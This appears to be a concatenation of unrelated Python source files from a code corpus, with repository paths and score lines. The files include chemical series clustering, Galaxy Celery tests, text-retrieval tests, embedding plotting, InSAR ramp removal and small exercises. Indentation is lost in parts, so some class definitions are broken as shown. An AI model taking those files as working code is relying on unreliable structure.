self.assertAlmostEqual(np.linalg.det(a), det(a))
x, y = sym.symbol('x y')
a = np.array([[x, y], [y, x]])
self.assertEqual(det(a), x**2 - y**2)
# ---------------------------------------------------------------------------------------#
if __name__ == '__main__':
unittest.main()
| 2.3125 | 2 |
src/automated_series_classification/mainSeriesClassification.py | yamasakih/AutomatedSeriesClassification | 12 | 12762224 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Jan 27 16:40:49 2020
@author: krugefr1
"""
import numpy as np
import os
try:
import arthor
except ImportError:
arthor = None
from rdkit import Chem
from rdkit.Chem import rdSubstructLibrary
import pickle
import random
import pandas as pd
import copy
from automated_series_classification import UPGMAclustering, Butinaclustering, utilsDataPrep
class Classification:
def __init__(self,
             proj,
             datapath,
             dbpath,
             filename,
             chembldb,
             flimit=1e-3,
             MinClusterSize=20,
             clustering='UPGMA',
             calcDists=True,
             calcScores=False,
             smilesCol='Smiles',
             idCol='ID',
             onlyCompleteRings=False,
             useArthor=True):
    """Load the project data set and build a substructure-search database.

    Args:
        proj: project name; used to derive database/file names.
        datapath: directory holding the input data and receiving outputs.
        dbpath: directory for the arthor database; in the RDKit fallback it
            may instead be a pickled-SubstructLibrary path or an
            rdSubstructLibrary.SubstructLibrary instance.
        filename: input data file name, forwarded to utilsDataPrep.
        chembldb: reference database used for MCS scoring by the clusterers.
        flimit: significance threshold for cluster selection.
        MinClusterSize: minimum number of compounds per reported series.
        clustering: 'UPGMA' or 'Butina'.
        calcDists: if True, (re)compute the pairwise distance matrix.
        calcScores: if True, keep MCS scores in the result dictionaries.
        smilesCol: name of the SMILES column in the input data.
        idCol: name of the compound-id column in the input data.
        onlyCompleteRings: forwarded to the UPGMA MCS computation.
        useArthor: if False, force the RDKit backend even when the arthor
            package is importable.
    """
    global arthor
    if not useArthor:
        arthor = None
    self.useArthor = useArthor
    self.proj = proj
    self.datapath = datapath
    self.dbpath = dbpath
    self.chembldb = chembldb
    self.flimit = flimit
    self.MinClusterSize = MinClusterSize
    self.clustering = clustering
    self.calcScores = calcScores
    self.calcDists = calcDists
    self.smilesCol = smilesCol
    self.idCol = idCol
    self.onlyCompleteRings = onlyCompleteRings

    # load data (moldata_proj: per-compound dataframe; distdata_proj: distance matrix)
    self.moldata_proj, self.distdata_proj = utilsDataPrep.PrepareData(
        self.proj,
        self.datapath,
        filename,
        distMeasure='Tanimoto',
        FP='Morgan2',
        calcDists=self.calcDists,
        smilesCol=smilesCol)

    if arthor is not None:
        if not os.path.isdir(dbpath):
            os.mkdir(dbpath)
        # set up project database for arthor substructure matching
        df = self.moldata_proj[[smilesCol, idCol]]
        # Write the .smi file into dbpath, which is where the smi2atdb call
        # below expects it (previously hard-coded to './arthor/', which broke
        # whenever dbpath pointed anywhere else).
        df.to_csv('{0}{1}.smi'.format(self.dbpath, self.proj),
                  header=None,
                  index=None,
                  sep=' ')
        os.system('smi2atdb -j 0 -l {0}{1}.smi {0}{1}.atdb'.format(
            self.dbpath, self.proj))
        os.system('atdb2fp -j 0 {0}{1}.atdb'.format(
            self.dbpath, self.proj))
        self.proj_db = arthor.SubDb('{0}{1}.atdb'.format(
            self.dbpath, self.proj))
    else:
        if isinstance(dbpath, rdSubstructLibrary.SubstructLibrary):
            # caller handed us a ready-made substructure library
            self.proj_db = dbpath
            self.db_size = len(self.proj_db)
        else:
            if not os.path.exists(dbpath):
                print("creating database")
                mols = rdSubstructLibrary.CachedTrustedSmilesMolHolder()
                fps = rdSubstructLibrary.PatternHolder()
                for smi in self.moldata_proj[smilesCol]:
                    m = Chem.MolFromSmiles(smi)
                    mols.AddSmiles(Chem.MolToSmiles(m))
                    fps.AddFingerprint(Chem.PatternFingerprint(m))
                self.proj_db = rdSubstructLibrary.SubstructLibrary(
                    mols, fps)
                self.db_size = len(mols)
                # context manager so the pickle file handle is not leaked
                with open(dbpath, 'wb+') as fileout:
                    pickle.dump(self.proj_db, fileout)
            else:
                with open(dbpath, 'rb') as filein:
                    self.proj_db = pickle.load(filein)
                self.db_size = len(self.proj_db)
def AssignSeriesToMCS(self, MCSdict):
    """Match every cluster's MCS SMARTS against the project database and
    deduplicate the resulting series.

    MCSdict maps cluster id -> tuple whose element [0] is a score and [2]
    the MCS SMARTS. Returns (MolAssignment, MCSdict): MolAssignment maps
    cluster id -> list of matching molecule indices; MCSdict is rebuilt with
    the match count and molecule list folded into each tuple.
    """
    # assign series to MCS of selected clusters
    smartslist = [v[2] for v in MCSdict.values()]
    MolAssign_prel = {}
    MolAssignment = {}
    for s in range(len(smartslist)):
        if arthor is not None:
            # arthor backend: substructure search directly on the atdb
            res = self.proj_db.search(smartslist[s])
            mols = [int(i) for i in res.to_array()]
        else:
            # RDKit fallback: SubstructLibrary match (indices into the library)
            mols = self.proj_db.GetMatches(Chem.MolFromSmarts(
                smartslist[s]),
                                           maxResults=self.db_size)
        MolAssign_prel[list(MCSdict.keys())[s]] = list(mols)
    # remove all series that are entirely in another series
    for key1 in MolAssign_prel.keys():
        add = 1
        for key2 in MolAssign_prel.keys():
            if key2 != key1:
                if set(MolAssign_prel[key1]).issubset(
                        set(MolAssign_prel[key2])):
                    # key1 survives only if the two series are identical AND
                    # key1 has the better (>=) MCS score; otherwise key1 is
                    # dominated by key2 and dropped.
                    if set(MolAssign_prel[key2]).issubset(
                            set(MolAssign_prel[key1])) and (
                                MCSdict[key1][0] >= MCSdict[key2][0]):
                        add = 1
                    else:
                        add = 0
                        break
        # the membership test also drops exact duplicates kept under two keys
        if add == 1 and MolAssign_prel[key1] not in MolAssignment.values():
            MolAssignment[key1] = MolAssign_prel[key1]
    # discard series that are too small to report
    MolAssignment = {
        k: MolAssignment[k]
        for k in MolAssignment.keys()
        if len(MolAssignment[k]) > self.MinClusterSize
    }
    # rebuild MCSdict for the surviving series; with scores the tuple keeps
    # one extra element ([3]) before the molecule list
    if self.calcScores:
        MCSdict = {
            k: (MCSdict[k][0], len(MolAssignment[k]), MCSdict[k][2],
                MCSdict[k][3], MolAssignment[k])
            for k in MolAssignment.keys()
        }
    else:
        MCSdict = {
            k: (MCSdict[k][0], len(MolAssignment[k]), MCSdict[k][2],
                MolAssignment[k])
            for k in MolAssignment.keys()
        }
    return MolAssignment, MCSdict
def ApplyClustering(self):
    """Cluster the project compounds, assign series via MCS substructure
    matching, and persist the results.

    Side effects: sets self.MolAssignment and self.MCSdict, adds a
    'ClusterID' list column to self.moldata_proj, and writes a CSV plus a
    pickled cluster dictionary into self.datapath.
    """
    # apply custering and calculate MCS
    if self.clustering == 'UPGMA':
        MCSdict = UPGMAclustering.ApplyUPGMA(
            self.distdata_proj,
            self.moldata_proj,
            self.chembldb,
            self.flimit,
            self.MinClusterSize,
            self.calcScores,
            onlyCompleteRings=self.onlyCompleteRings,
            useArthor=self.useArthor)
    elif self.clustering == 'Butina':
        # deepcopy because ApplyButina mutates the distance matrix
        # (presumably -- confirm against Butinaclustering)
        distdata = copy.deepcopy(self.distdata_proj)
        MCSdict = Butinaclustering.ApplyButina(distdata,
                                               self.moldata_proj,
                                               self.chembldb,
                                               self.flimit,
                                               self.MinClusterSize,
                                               self.calcScores,
                                               useArthor=self.useArthor)
    else:
        print('Clustering algorithm not implemented.')
        return
    # assign series through substructure matching and filtering
    self.MolAssignment, self.MCSdict = self.AssignSeriesToMCS(MCSdict)
    # prepare and save output: one (possibly empty) list of cluster ids per compound
    self.moldata_proj['ClusterID'] = [
        list() for x in range(self.moldata_proj.shape[0])
    ]
    for k, vs in self.MolAssignment.items():
        for v in vs:
            # in-place append into the per-row list (positional index v)
            self.moldata_proj['ClusterID'].iloc[v].append(k)
    if self.clustering == 'UPGMA':
        self.moldata_proj.to_csv('{0}moldata_UPGMA.csv'.format(
            self.datapath))
        with open('{0}ClusterData_UPGMA.pkl'.format(self.datapath),
                  'wb') as fileout:
            pickle.dump(self.MCSdict, fileout)
    elif self.clustering == 'Butina':
        self.moldata_proj.to_csv('{0}moldata_Butina.csv'.format(
            self.datapath))
        with open('{0}ClusterData_Butina.pkl'.format(self.datapath),
                  'wb') as fileout:
            pickle.dump(self.MCSdict, fileout)
    else:
        print('Clustering algorithm not implemented.')
        return
def CalculatePerformance(self, seriescolumn='series assignment'):
    """Benchmark the automated classification against a human-defined one.

    The human-defined assignment lives in column `seriescolumn` of
    self.moldata_proj (with the scaffold labels in column 'scaffold'); the
    automated assignment is self.MolAssignment. For every automatically
    identified series the F1 score against each human-defined series is
    computed, and the series is linked to the human-defined series with the
    highest F1. Results are stored in self.PerformanceClusters and pickled
    into self.datapath.
    """
    scaflist = list(set(self.moldata_proj['scaffold'].tolist()))
    scaflist.sort()
    # rows: human-defined scaffolds, cols: automatically found clusters
    intersect_matrix = np.zeros((len(scaflist), len(self.MolAssignment)))
    NMatchScaf = []
    NMatchCluster = np.array([len(v) for v in self.MolAssignment.values()])
    for scaf_ind in range(len(scaflist)):
        # compounds whose human assignment contains this scaffold label
        mollist = self.moldata_proj[self.idCol].loc[self.moldata_proj[
            seriescolumn].map(lambda x: scaflist[scaf_ind] in x)].tolist()
        intersect_scaf = np.array([
            len(list(set(mollist) & set(clusterlist)))
            for clusterlist in self.MolAssignment.values()
        ])
        intersect_matrix[scaf_ind, :] = intersect_scaf
        NMatchScaf.append(len(mollist))
    NMatchScaf = np.array(NMatchScaf)
    RecallMatrix = intersect_matrix / NMatchScaf[:, None]
    PrecMatrix = intersect_matrix / NMatchCluster[None, :]
    # 1e-9 guards against division by zero when both terms are zero
    Fscore = (2 * RecallMatrix * PrecMatrix) / (RecallMatrix + PrecMatrix +
                                                1e-9)
    # for each cluster (column), the scaffold with the best F1 score
    maxscore = np.argmax(Fscore, axis=0)
    PrecVector = np.zeros(len(self.MolAssignment))
    RecallVector = np.zeros(len(self.MolAssignment))
    FscoreVector = np.zeros(len(self.MolAssignment))
    LinkVector = []
    for col in range(len(self.MolAssignment)):
        PrecVector[col] = PrecMatrix[maxscore[col], col]
        RecallVector[col] = RecallMatrix[maxscore[col], col]
        FscoreVector[col] = Fscore[maxscore[col], col]
        LinkVector.append((list(self.MolAssignment.keys())[col],
                           scaflist[maxscore[col]]))
    LinkVector = np.array(LinkVector)
    self.PerformanceClusters = {
        'recall': RecallVector,
        'precision': PrecVector,
        'Fscore': FscoreVector,
        'linked series': LinkVector
    }
    if self.clustering == 'UPGMA':
        with open('{0}PerformanceData_UPGMA.pkl'.format(self.datapath),
                  'wb') as fileout:
            pickle.dump(self.PerformanceClusters, fileout)
    elif self.clustering == 'Butina':
        with open('{0}PerformanceData_Butina.pkl'.format(self.datapath),
                  'wb') as fileout:
            pickle.dump(self.PerformanceClusters, fileout)
    else:
        print('Clustering algorithm not implemented.')
        return
def ClassificationCrossValidation(self, fraction_sample, N_sample):
    """Re-run the series classification on random subsamples of the data.

    Args:
        fraction_sample: fraction (0..1] of compounds drawn per repetition.
        N_sample: number of repetitions.

    Side effects: stores each repetition's series dictionary in
    self.SampledSeries and pickles the whole dict into self.datapath.
    """
    samplerange = np.arange(len(self.moldata_proj))
    invfrac = 1 / fraction_sample
    self.SampledSeries = {}
    for i in range(N_sample):
        # random sampling; seeded per repetition for reproducibility
        random.seed((i + 1) * 10)
        molinds = random.sample(population=samplerange.tolist(),
                                k=int(
                                    len(samplerange.tolist()) // invfrac))
        moldata_sample = self.moldata_proj.iloc[molinds]
        # restrict the distance matrix to the sampled rows AND columns
        distdata_sample = self.distdata_proj[molinds, :]
        distdata_sample = distdata_sample[:, molinds]
        # apply custering and calculate MCS
        if self.clustering == 'UPGMA':
            MCSdict_sampled = UPGMAclustering.ApplyUPGMA(
                distdata_sample,
                moldata_sample,
                self.chembldb,
                self.flimit,
                self.MinClusterSize,
                self.calcScores,
                useArthor=self.useArthor)
        elif self.clustering == 'Butina':
            MCSdict_sampled = Butinaclustering.ApplyButina(
                distdata_sample,
                moldata_sample,
                self.chembldb,
                self.flimit,
                self.MinClusterSize,
                self.calcScores,
                useArthor=self.useArthor)
        else:
            print('Clustering algorithm not implemented.')
            return
        # assign series through substructure matching and filtering
        MolAssignment_sampled, MCSdict_sampled = self.AssignSeriesToMCS(
            MCSdict_sampled)
        self.SampledSeries[i] = MCSdict_sampled
    if self.clustering == 'UPGMA':
        with open(
                '{0}SampledSeries{1}_UPGMA.pkl'.format(
                    self.datapath, int(fraction_sample * 100)),
                'wb') as fileout:
            pickle.dump(self.SampledSeries, fileout)
    elif self.clustering == 'Butina':
        with open(
                '{0}SampledSeries{1}_Butina.pkl'.format(
                    self.datapath, int(fraction_sample * 100)),
                'wb') as fileout:
            pickle.dump(self.SampledSeries, fileout)
    else:
        print('Clustering algorithm not implemented.')
        return
    return
def EvaluationCrossValidation(self):
    """Compare the sampled classifications ("SampledSeries") against the
    original classification ("MCSdict").

    For every original series and every repetition, the best F1 score over
    all sampled series is recorded in the DataFrame self.EvalCrossval with
    columns ['series id', 'repetition', 'fscore'].
    """
    self.EvalCrossval = pd.DataFrame(
        columns=['series id', 'repetition', 'fscore'])
    for rep in self.SampledSeries.keys():
        rep_dict = self.SampledSeries[rep]
        keylist = [k for k in rep_dict.keys()]
        for k in self.MCSdict.keys():
            # overlap of the original series with every sampled series
            # (element [-1] of each tuple is the molecule list)
            intersect = [
                len(set(self.MCSdict[k][-1]) & set(v[-1]))
                for v in rep_dict.values()
            ]
            recall = np.array([
                intersect[i] / len(rep_dict[keylist[i]][-1])
                for i in range(len(keylist))
            ])
            precision = np.array(intersect) / len(self.MCSdict[k][-1])
            # best F1 over all sampled series; 1e-9 avoids 0/0
            fscore = max(2 * recall * precision /
                         (recall + precision + 1e-9))
            row = [int(k), int(rep), fscore]
            self.EvalCrossval.loc[len(self.EvalCrossval)] = row
    self.EvalCrossval['series id'] = self.EvalCrossval['series id'].apply(
        int)
| 2.203125 | 2 |
test/integration/test_celery_tasks.py | beatrizserrano/galaxy | 0 | 12762225 | <gh_stars>0
from celery import shared_task
from galaxy.celery import galaxy_task
from galaxy.celery.tasks import purge_hda
from galaxy.model import HistoryDatasetAssociation
from galaxy.schema.schema import CreatePagePayload
from galaxy_test.base.populators import (
DatasetPopulator,
wait_on,
)
from galaxy_test.driver.integration_util import (
IntegrationTestCase,
UsesCeleryTasks,
)
@shared_task
def mul(x, y):
    """Trivial Celery task used to verify the test harness can execute tasks."""
    return x * y
@galaxy_task
def process_page(request: CreatePagePayload):
    """Example galaxy task that consumes a pydantic model and echoes two fields."""
    # an example task that consumes a pydantic model
    return f"content_format is {request.content_format} with annotation {request.annotation}"
class CeleryTasksIntegrationTestCase(IntegrationTestCase, UsesCeleryTasks):
    """Integration tests exercising Galaxy's Celery task machinery end to end."""

    def setUp(self):
        super().setUp()
        self.dataset_populator = DatasetPopulator(self.galaxy_interactor)

    def test_random_simple_task_to_verify_framework_for_testing(self):
        # sanity check: a plain Celery task round-trips through the worker
        assert mul.delay(4, 4).get(timeout=10) == 16

    def test_task_with_pydantic_argument(self):
        # pydantic payloads must survive task serialization/deserialization
        request = CreatePagePayload(
            content_format="markdown",
            title="my cool title",
            slug="my-cool-title",
            annotation="my cool annotation",
        )
        assert (
            process_page.delay(request).get(timeout=10)
            == "content_format is markdown with annotation my cool annotation"
        )

    def test_galaxy_task(self):
        # purge_hda must purge the most recently created HDA
        history_id = self.dataset_populator.new_history()
        dataset = self.dataset_populator.new_dataset(history_id, wait=True)
        hda = self._latest_hda
        assert hda

        def hda_purged():
            # truthy only once the dataset is reported as purged (for wait_on)
            latest_details = self.dataset_populator.get_history_dataset_details(
                history_id, dataset=dataset, assert_ok=False, wait=False
            )
            return True if latest_details["purged"] else None

        assert not hda_purged()

        purge_hda.delay(hda_id=hda.id).get(timeout=10)

        wait_on(hda_purged, "dataset to become purged")
        assert hda_purged()

    @property
    def _latest_hda(self):
        # most recently inserted HistoryDatasetAssociation, or None if none exist
        latest_hda = (
            self._app.model.session.query(HistoryDatasetAssociation)
            .order_by(HistoryDatasetAssociation.table.c.id.desc())
            .first()
        )
        return latest_hda
| 2.09375 | 2 |
tests/test_collection.py | mpkato/openliveq | 5 | 12762226 | import openliveq as olq
import pytest
import os
from .test_base import TestBase
class TestCollection(TestBase):
    """Tests for openliveq.Collection term-frequency statistics."""

    def test_df(self, c):
        # document frequency: number of questions containing the term
        result = c.df
        assert result["社会保険事務所"] == 1
        assert result["国民年金"] == 4

    def test_cf(self, c):
        # collection frequency: total occurrences, strictly above the df here
        result = c.cf
        assert result["社会保険事務所"] > 1
        assert result["国民年金"] > 4

    @pytest.fixture
    def c(self, parsed_questions):
        """A Collection built from all parsed questions."""
        result = olq.Collection()
        for ws in parsed_questions:
            result.add(ws)
        return result

    @pytest.fixture
    def ff(self):
        """A fresh FeatureFactory instance."""
        return olq.FeatureFactory()

    @pytest.fixture
    def parsed_questions(self, ff, questions):
        """The `questions` fixture parsed through the FeatureFactory."""
        result = []
        for q in questions:
            result.append(ff.parse_question(q))
        return result
| 2.296875 | 2 |
src/utils/embeddingvis.py | fatterbetter/CodeSearchNet | 1,681 | 12762227 | <reponame>fatterbetter/CodeSearchNet
#!/usr/bin/env python
"""
Usage:
embeddingvis.py [options] plot-tsne (--code | --query) MODEL_PATH
embeddingvis.py [options] print-nns (--code | --query) MODEL_PATH DISTANCE_THRESHOLD
Options:
--azure-info=<path> Azure authentication information file (JSON). Used to load data from Azure storage.
--distance-metric METRIC The distance metric to use [default: cosine]
--num-nns NUM The number of nearest neighbors to show when print-nns. [default: 2]
--lim-items NUM Maximum number of items to use. Useful when memory is limited. [default: -1]
-h --help Show this screen.
--hypers-override HYPERS JSON dictionary overriding hyperparameter values.
--language LANG The code language to use. Only when --code option is given. [default: python]
--debug Enable debug routines. [default: False]
"""
from docopt import docopt
from dpu_utils.utils import RichPath, run_and_debug
from sklearn.manifold import TSNE
import numpy as np
from scipy.spatial.distance import pdist
import matplotlib.pyplot as plt
import model_restore_helper
from utils.visutils import square_to_condensed
def run(arguments) -> None:
    """Restore a model and either t-SNE-plot its token embeddings or print
    nearest neighbours below a distance threshold.

    Args:
        arguments: parsed docopt dictionary (see module docstring).
    """
    azure_info_path = arguments.get('--azure-info', None)
    model_path = RichPath.create(arguments['MODEL_PATH'], azure_info_path=azure_info_path)
    model = model_restore_helper.restore(
        path=model_path,
        is_train=False)

    if arguments['--query']:
        embeddings, elements = model.get_query_token_embeddings()
    else:
        embeddings, elements = model.get_code_token_embeddings(arguments['--language'])

    # optionally cap the number of items (useful when memory is limited)
    max_num_elements = int(arguments['--lim-items'])
    if max_num_elements > 0:
        embeddings, elements = embeddings[:max_num_elements], elements[:max_num_elements]

    print(f'Collected {len(elements)} elements to visualize.')
    embeddings = model.sess.run(fetches=embeddings)

    if arguments['plot-tsne']:
        emb_2d = TSNE(n_components=2, verbose=1, metric=arguments['--distance-metric']).fit_transform(embeddings)
        plt.scatter(emb_2d[:, 0], emb_2d[:, 1])
        for i in range(len(elements)):
            plt.annotate(elements[i], xy=(emb_2d[i, 0], emb_2d[i, 1]))
        plt.show()
    elif arguments['print-nns']:
        flat_distances = pdist(embeddings, arguments['--distance-metric'])
        num_nns = int(arguments['--num-nns'])

        for i, element in enumerate(elements):
            # distance of i to every j, with inf on the diagonal so an
            # element is never its own nearest neighbour
            # (dtype=float: the np.float alias was removed in NumPy 1.24)
            distance_from_i = np.fromiter(
                (flat_distances[square_to_condensed(i, j, len(elements))] if i != j else float('inf') for j in
                 range(len(elements))), dtype=float)
            nns = [int(k) for k in np.argsort(distance_from_i)[:num_nns]]  # the num_nns nearest neighbours

            if distance_from_i[nns[0]] > float(arguments['DISTANCE_THRESHOLD']):
                continue
            try:
                print(f'{element} --> ' + ', '.join(f'{elements[n]} ({distance_from_i[n]:.2f})' for n in nns))
            except Exception:
                # some tokens cannot be encoded by the active stdout codec;
                # narrowed from a bare except (which also caught KeyboardInterrupt)
                print('Error printing token for nearest neighbors pair.')
print('Error printing token for nearest neighbors pair.')
if __name__ == '__main__':
args = docopt(__doc__)
run_and_debug(lambda: run(args), args.get('--debug', False)) | 2.328125 | 2 |
lectures/primes.py | danielmccallion/pands-problems | 0 | 12762228 | <reponame>danielmccallion/pands-problems<filename>lectures/primes.py
# <NAME>
# Computing the primes
# My list of primes
p = []
# Loop through all of the numbers we're
# checking for primality
for i in range (2,10000):
# Assume that i is a prime
is_prime = True
# Look through all values j from 2 up
# to but not including i
# for j in range(2,i):
for j in p:
# See if j divides i
if i % j == 0:
# If it does, i isn't prime exit loop
# and indicate its not prime
is_prime = False
break
# If i is prime, then append to p
if is_prime:
p.append(i)
# Print out the primes
print(p)
| 4.1875 | 4 |
examples/sync/find_properties.py | OpenStuder/openstuder-client-python | 0 | 12762229 | <filename>examples/sync/find_properties.py
from openstuder import SIGatewayClient, SIProtocolError

try:
    # Connect synchronously to a local OpenStuder gateway and search for all
    # properties matching "*.*.3136" (any access / any device, property 3136).
    client = SIGatewayClient()
    client.connect('localhost')
    status, id_, count, properties = client.find_properties('*.*.3136')
    print(f'Found properties for {id_}, status = {status}, count = {count} : {properties}')
except SIProtocolError as error:
    # protocol-level failure (connection refused, authorization, ...)
    print(f'Error: {error.reason()}')
| 2.25 | 2 |
40 Algorithm challenge/challenge 19.py | T0dCNg/All-In-One | 1 | 12762230 | #challenge 19
#Write an algorithm that:
# •Asks the user to input a number and repeat this until they guess the number 7.
# •Congratulate the user with a ‘Well Done’ message when they guess correctly.
num = "num"
while num != 7:
num = int(input("Please enter a number: "))
print("Well Done")
| 3.96875 | 4 |
pysar/_remove_surface.py | insarwxw/PySAR | 6 | 12762231 | #! /usr/bin/env python2
############################################################
# Program is part of PySAR v1.0 #
# Copyright(c) 2013, <NAME> #
# Author: <NAME> #
############################################################
# Yunjun, Jun 2016: merge functions for interferograms, timeseries
# into one, and use read() for all the others
# Yunjun, Aug 2016: add remove*multiple_surface()
# Recommend usage:
# import pysar._remove_surface as rm
import os
import time
import h5py
import numpy as np
import pysar._datetime as ptime
import pysar._readfile as readfile
import pysar._writefile as writefile
##################################################################
def remove_data_surface(data, mask, surf_type='plane'):
    '''Fit a polynomial surface to the masked pixels of data and subtract it.

    Args:
        data: 2D array; NaN pixels are never used for the fit.
        mask: 2D array; non-zero marks pixels used to estimate the surface
            (modified in place: NaN pixels of data are zeroed out first).
        surf_type: 'plane' (default), 'quadratic', 'quadratic_range',
            'quadratic_azimuth', 'plane_range' or 'plane_azimuth'.

    Returns:
        Tuple (data_n, zplane): the de-ramped data and the fitted surface,
        both cast to data's dtype. Pixels where data == 0 stay 0.
    '''
    mask[np.isnan(data)] = 0
    # Column-major (Fortran) flattening. The original used the legacy
    # flatten(1) spelling, which modern numpy rejects; 'F' preserves the old
    # behaviour, and any order is correct as long as z and the coordinate
    # grid below are flattened consistently.
    mask = mask.flatten('F')
    z = data.flatten('F')
    ndx = mask != 0

    # Pixel coordinate grid: y1 is the row (azimuth), x1 the column (range).
    x = range(0, np.shape(data)[1])
    y = range(0, np.shape(data)[0])
    x1, y1 = np.meshgrid(x, y)
    points = np.vstack((y1.flatten('F'), x1.flatten('F'))).T

    # Build the design matrix G for the requested surface model.
    if surf_type == 'quadratic':
        G = np.array([points[:, 0]**2, points[:, 1]**2, points[:, 0],
                      points[:, 1], points[:, 0]*points[:, 1],
                      np.ones(np.shape(points)[0])], np.float32).T
    elif surf_type == 'plane':
        G = np.array([points[:, 0], points[:, 1],
                      np.ones(np.shape(points)[0])], np.float32).T
    elif surf_type == 'quadratic_range':
        G = np.array([points[:, 1]**2, points[:, 1],
                      np.ones(np.shape(points)[0])], np.float32).T
    elif surf_type == 'quadratic_azimuth':
        G = np.array([points[:, 0]**2, points[:, 0],
                      np.ones(np.shape(points)[0])], np.float32).T
    elif surf_type == 'plane_range':
        G = np.array([points[:, 1],
                      np.ones(np.shape(points)[0])], np.float32).T
    elif surf_type == 'plane_azimuth':
        G = np.array([points[:, 0],
                      np.ones(np.shape(points)[0])], np.float32).T

    # Least-squares fit using only the masked pixels.
    z = z[ndx]
    G = G[ndx]
    G1 = np.linalg.pinv(G)
    plane = np.dot(G1, z)

    # Evaluate the fitted surface on the full grid.
    if surf_type == 'quadratic':
        zplane = plane[0]*y1**2 + plane[1]*x1**2 + plane[2]*y1 + plane[3]*x1 + plane[4]*y1*x1 + plane[5]
    elif surf_type == 'plane':
        zplane = plane[0]*y1 + plane[1]*x1 + plane[2]
    elif surf_type == 'quadratic_range':
        zplane = plane[0]*x1**2 + plane[1]*x1 + plane[2]
    elif surf_type == 'quadratic_azimuth':
        zplane = plane[0]*y1**2 + plane[1]*y1 + plane[2]
    elif surf_type == 'plane_range':
        zplane = plane[0]*x1 + plane[1]
    elif surf_type == 'plane_azimuth':
        zplane = plane[0]*y1 + plane[1]

    data_n = data - zplane
    data_n[data == 0.] = 0.      # keep no-data pixels at zero
    data_n = np.array(data_n, data.dtype)
    zplane = np.array(zplane, data.dtype)
    return data_n, zplane
##################################################################
def remove_data_multiple_surface(data, mask, surf_type, ysub):
    ## Remove a separate surface from each row band of the data.
    ## ysub = [y0_start,y0_end, y1_start,y1_end, ...], e.g. [0,2400,2000,6800];
    ## where consecutive bands overlap, the two estimates are averaged.
    dataOut = np.zeros(data.shape,data.dtype)
    dataOut[:] = np.nan

    surfaceNum = len(ysub)/2      # integer division under python2

    ## 1st Mask
    print 'removing 1st surface ...'
    i = 0
    # restrict the mask to the first band, fit/remove the surface there
    mask_i = np.zeros(data.shape,data.dtype)
    mask_i[ysub[2*i]:ysub[2*i+1],:] = mask[ysub[2*i]:ysub[2*i+1],:]
    dataOut_i,ramp_i = remove_data_surface(data,mask_i,surf_type)
    dataOut[ysub[2*i]:ysub[2*i+1],:] = dataOut_i[ysub[2*i]:ysub[2*i+1],:]

    ## 2 - last Masks
    for i in range(1,surfaceNum):
        print 'removing '+str(i+1)+'th surface ...'
        mask_i = np.zeros(data.shape,data.dtype)
        mask_i[ysub[2*i]:ysub[2*i+1],:] = mask[ysub[2*i]:ysub[2*i+1],:]
        dataOut_i,ramp_i = remove_data_surface(data,mask_i,surf_type)

        if ysub[2*i] < ysub[2*i-1]:
            # this band overlaps the previous one: average the two estimates
            # in the overlap region, then take this band's estimate below it
            dataOut[ysub[2*i]:ysub[2*i-1],:] += dataOut_i[ysub[2*i]:ysub[2*i-1],:]
            dataOut[ysub[2*i]:ysub[2*i-1],:] /= 2
            dataOut[ysub[2*i-1]:ysub[2*i+1],:] = dataOut_i[ysub[2*i-1]:ysub[2*i+1],:]
        else:
            dataOut[ysub[2*i]:ysub[2*i+1],:] = dataOut_i[ysub[2*i]:ysub[2*i+1],:]
    return dataOut
##################################################################
def remove_surface(File, surf_type, maskFile=None, outFile=None, ysub=None):
    ## Remove a polynomial ramp (surf_type) from a PySAR HDF5/binary file.
    ## File     : input file name (multi-dataset h5 or single-dataset file)
    ## surf_type: ramp type, see remove_data_surface()
    ## maskFile : optional mask file; defaults to the whole area
    ## outFile  : optional output name; defaults to <File>_<surf_type><ext>
    ## ysub     : optional row bands for remove_data_multiple_surface()
    ## Returns the output file name.
    start = time.time()
    atr = readfile.read_attribute(File)

    # Output File Name
    if not outFile:
        outFile = os.path.splitext(File)[0]+'_'+surf_type+os.path.splitext(File)[1]

    if maskFile:
        Mask = readfile.read(maskFile)[0]
        print 'read mask file: '+maskFile
    else:
        Mask = np.ones((int(atr['FILE_LENGTH']), int(atr['WIDTH'])))
        print 'use mask of the whole area'

    ##### Input File Info
    atr = readfile.read_attribute(File)
    k = atr['FILE_TYPE']
    print 'Input file is '+k
    print 'remove ramp type: '+surf_type

    ## Multiple Datasets File: de-ramp every epoch/interferogram separately
    if k in ['interferograms','coherence','wrapped','timeseries']:
        h5file = h5py.File(File,'r')
        epochList = sorted(h5file[k].keys())
        epoch_num = len(epochList)
        prog_bar = ptime.progress_bar(maxValue=epoch_num)

        h5flat = h5py.File(outFile,'w')
        group = h5flat.create_group(k)
        print 'writing >>> '+outFile

        if k in ['timeseries']:
            print 'number of acquisitions: '+str(len(epochList))
            for i in range(epoch_num):
                epoch = epochList[i]
                data = h5file[k].get(epoch)[:]

                if not ysub:
                    data_n,ramp = remove_data_surface(data, Mask, surf_type)
                else:
                    data_n = remove_data_multiple_surface(data, Mask, surf_type, ysub)

                dset = group.create_dataset(epoch, data=data_n, compression='gzip')
                prog_bar.update(i+1, suffix=epoch)
            # copy file-level attributes once
            for key,value in h5file[k].attrs.iteritems():
                group.attrs[key] = value

        elif k in ['interferograms','wrapped','coherence']:
            print 'number of interferograms: '+str(len(epochList))
            date12_list = ptime.list_ifgram2date12(epochList)
            for i in range(epoch_num):
                epoch = epochList[i]
                data = h5file[k][epoch].get(epoch)[:]

                if not ysub:
                    data_n,ramp = remove_data_surface(data,Mask,surf_type)
                else:
                    data_n = remove_data_multiple_surface(data, Mask, surf_type, ysub)

                gg = group.create_group(epoch)
                dset = gg.create_dataset(epoch, data=data_n, compression='gzip')
                # per-interferogram attributes are copied to each subgroup
                for key,value in h5file[k][epoch].attrs.iteritems():
                    gg.attrs[key] = value
                prog_bar.update(i+1, suffix=date12_list[i])

    ## Single Dataset File
    else:
        data,atr = readfile.read(File)
        print 'Removing '+surf_type+' from '+k
        if not ysub:
            data_n,ramp = remove_data_surface(data, Mask, surf_type)
        else:
            data_n = remove_data_multiple_surface(data, Mask, surf_type, ysub)
        print 'writing >>> '+outFile
        writefile.write(data_n,atr,outFile)

    # the h5 handles/progress bar only exist on the multi-dataset path
    try:
        h5file.close()
        h5flat.close()
        prog_bar.close()
    except: pass

    print 'Remove '+surf_type+' took ' + str(time.time()-start) +' secs'
    return outFile
| 2.46875 | 2 |
01_comment_print_variables.py | rriquelme/python_3_tutorial | 0 | 12762232 | # Section 1: Comments and Print
# A single line comment in python is indicated by a # at the beginning
''' This
is
a
